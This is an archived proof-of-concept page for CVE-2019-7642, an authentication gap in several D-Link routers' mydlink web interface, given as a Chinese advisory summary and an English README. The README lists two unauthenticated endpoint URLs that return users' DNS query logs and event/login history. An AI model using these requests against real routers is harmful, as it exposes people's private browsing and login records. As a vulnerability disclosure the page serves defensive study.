CVE-2019-7642 PoC — 多款D-Link产品访问控制错误漏洞

Source

https://github.com/xw77cve/CVE-2019-7642

Associated Vulnerability

Title:多款D-Link产品访问控制错误漏洞 (CVE-2019-7642)
Description:D-Link DIR-816是中国台湾友讯（D-Link）公司的一款无线路由器。多款D-Link产品中存在访问控制错误漏洞，该漏洞源于mydlink功能的Web界面没有要求进行身份验证。远程攻击者可利用该漏洞获取用户的DNS查询日志和登录日志。以下产品受到影响：D-Link DIR-817LW (A1-1.04)；DIR-816L (B1-2.06)；DIR-816 (B1-2.06)；DIR-850L (A1-1.09)；DIR-868L (A1-1.10)。

Readme

# CVE-2019-7642
D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users' DNS query logs and login logs.

Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-850L (A1-1.09) and DIR-868L (A1-1.10).

PoC1: http://target/mydlink/get_LogDnsQuery.asp
![poc1](https://github.com/xw77cve/CVE-2019-7642/blob/master/CVE-2019-7642-poc1.PNG)
PoC2: http://target/mydlink/get_TriggedEventHistory.asp
![poc2](https://github.com/xw77cve/CVE-2019-7642/blob/master/CVE-2019-7642-poc2.PNG)

File Snapshot


 [4.0K]  /data/pocs/65ff32c2ddcf51976567a2ca3cf6d2e6a026bd81
├── [113K]  CVE-2019-7642-poc1.PNG
├── [ 93K]  CVE-2019-7642-poc2.PNG
└── [ 631]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!